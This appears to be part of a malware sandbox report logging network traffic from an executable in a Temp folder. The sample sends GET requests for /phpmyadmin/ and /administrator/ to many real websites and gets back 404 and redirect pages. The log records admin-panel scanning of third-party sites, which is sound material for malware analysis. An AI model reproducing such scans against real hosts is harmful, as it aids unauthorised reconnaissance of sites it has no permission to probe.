                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC5396INData Raw: 20 20 20 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 6e 61 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 09 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 62 72 65 61 64 5f 63 72 75 6d 62 22 3e 0a 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 65 76 65 6c 2d 31 20 74 6f 70 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 67 6f 6b 6f 72 6f 6b 61 6e 2e 63 6f 6d 2f 22 3e e3 83 9b e3 83 bc e3 83 a0 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 65 76 65 6c 2d 32 20 73 75 62 20 74 61 69 6c 20 63 75 72 72 65 6e 74 22 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 73 65 63 74 69
                                                                                                                                                                                                                                                                                                                                Data Ascii: </div> </div> </nav><div class="wrapper"><div id="content"><ul class="bread_crumb"><li class="level-1 top"><a href="https://magokorokan.com/"></a></li><li class="level-2 sub tail current">404 Not Found</li></ul><secti
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                58192.168.2.45399785.248.129.354435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: inhodinky.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC757INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://www.inhodinky.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Expires: Fri, 20 Dec 2024 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-Aws-Security-Level: 23
                                                                                                                                                                                                                                                                                                                                Permissions-Policy: accelerometer=(), camera=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), payment=(), usb=()
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src https: wss: blob: data: 'unsafe-eval' 'unsafe-inline'; object-src 'self'
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                Alt-Svc: h2=":443"; ma=3600
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                59192.168.2.45431868.233.46.1094435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: brightright.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC164INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                60192.168.2.45437250.116.86.494435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: escolapatelli.com.br
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC381INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                Link: <https://escolapatelli.com.br/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC7811INData Raw: 34 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 45 73 63 6f 6c 61 73 20 50 61 74 65 6c 6c 69 3c 2f 74 69
                                                                                                                                                                                                                                                                                                                                Data Ascii: 4000<!doctype html><html lang="pt-BR"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Pgina no encontrada &#8211; Escolas Patelli</ti
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC8579INData Raw: 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74
                                                                                                                                                                                                                                                                                                                                Data Ascii: line-start: 2em;margin-inline-end: 0;}body .is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-const
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC2168INData Raw: 38 36 63 0d 0a 32 3b 20 66 65 61 74 75 72 65 73 3a 20 65 5f 64 6f 6d 5f 6f 70 74 69 6d 69 7a 61 74 69 6f 6e 2c 20 65 5f 6f 70 74 69 6d 69 7a 65 64 5f 61 73 73 65 74 73 5f 6c 6f 61 64 69 6e 67 2c 20 65 5f 6f 70 74 69 6d 69 7a 65 64 5f 63 73 73 5f 6c 6f 61 64 69 6e 67 2c 20 65 5f 66 6f 6e 74 5f 69 63 6f 6e 5f 73 76 67 2c 20 61 64 64 69 74 69 6f 6e 61 6c 5f 63 75 73 74 6f 6d 5f 62 72 65 61 6b 70 6f 69 6e 74 73 2c 20 62 6c 6f 63 6b 5f 65 64 69 74 6f 72 5f 61 73 73 65 74 73 5f 6f 70 74 69 6d 69 7a 65 2c 20 65 5f 69 6d 61 67 65 5f 6c 6f 61 64 69 6e 67 5f 6f 70 74 69 6d 69 7a 61 74 69 6f 6e 3b 20 73 65 74 74 69 6e 67 73 3a 20 63 73 73 5f 70 72 69 6e 74 5f 6d 65 74 68 6f 64 2d 65 78 74 65 72 6e 61 6c 2c 20 67 6f 6f 67 6c 65 5f 66 6f 6e 74 2d 65 6e 61 62 6c 65 64
                                                                                                                                                                                                                                                                                                                                Data Ascii: 86c2; features: e_dom_optimization, e_optimized_assets_loading, e_optimized_css_loading, e_font_icon_svg, additional_custom_breakpoints, block_editor_assets_optimize, e_image_loading_optimization; settings: css_print_method-external, google_font-enabled


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                61192.168.2.45437750.116.86.494435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: escolapatelli.com.br
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC381INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                Link: <https://escolapatelli.com.br/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC7811INData Raw: 34 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 45 73 63 6f 6c 61 73 20 50 61 74 65 6c 6c 69 3c 2f 74 69
                                                                                                                                                                                                                                                                                                                                Data Ascii: 4000<!doctype html><html lang="pt-BR"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Pgina no encontrada &#8211; Escolas Patelli</ti
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC8579INData Raw: 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74
                                                                                                                                                                                                                                                                                                                                Data Ascii: line-start: 2em;margin-inline-end: 0;}body .is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-const
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC2168INData Raw: 38 36 63 0d 0a 32 3b 20 66 65 61 74 75 72 65 73 3a 20 65 5f 64 6f 6d 5f 6f 70 74 69 6d 69 7a 61 74 69 6f 6e 2c 20 65 5f 6f 70 74 69 6d 69 7a 65 64 5f 61 73 73 65 74 73 5f 6c 6f 61 64 69 6e 67 2c 20 65 5f 6f 70 74 69 6d 69 7a 65 64 5f 63 73 73 5f 6c 6f 61 64 69 6e 67 2c 20 65 5f 66 6f 6e 74 5f 69 63 6f 6e 5f 73 76 67 2c 20 61 64 64 69 74 69 6f 6e 61 6c 5f 63 75 73 74 6f 6d 5f 62 72 65 61 6b 70 6f 69 6e 74 73 2c 20 62 6c 6f 63 6b 5f 65 64 69 74 6f 72 5f 61 73 73 65 74 73 5f 6f 70 74 69 6d 69 7a 65 2c 20 65 5f 69 6d 61 67 65 5f 6c 6f 61 64 69 6e 67 5f 6f 70 74 69 6d 69 7a 61 74 69 6f 6e 3b 20 73 65 74 74 69 6e 67 73 3a 20 63 73 73 5f 70 72 69 6e 74 5f 6d 65 74 68 6f 64 2d 65 78 74 65 72 6e 61 6c 2c 20 67 6f 6f 67 6c 65 5f 66 6f 6e 74 2d 65 6e 61 62 6c 65 64
                                                                                                                                                                                                                                                                                                                                Data Ascii: 86c2; features: e_dom_optimization, e_optimized_assets_loading, e_optimized_css_loading, e_font_icon_svg, additional_custom_breakpoints, block_editor_assets_optimize, e_image_loading_optimization; settings: css_print_method-external, google_font-enabled


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                62192.168.2.45383283.167.249.74435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC271INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: https://www.kompresory-servis.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC263INData Raw: 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: fc<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.kompresory-servis.sk/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                63192.168.2.454120164.46.93.1894435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: st-comet.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC269INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 23 Mar 2020 06:02:46 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "415-5a17f6251cd80"
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                Content-Length: 1045
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC1045INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab ef bc 88 55 52 4c ef bc 89 e3 81 8c e3 81 bf e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 7a 65 6e 6c 6f 67 69 63 5f 70 61
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title> 404 Not Found URL</title> <link rel="stylesheet" href="/zenlogic_pa


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                64192.168.2.453796157.205.193.1254435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: magokorokan.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC422INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                Link: <https://magokorokan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                                                                                                X-FRAME-OPTIONS: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC6INData Raw: 32 32 36 34 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 2264
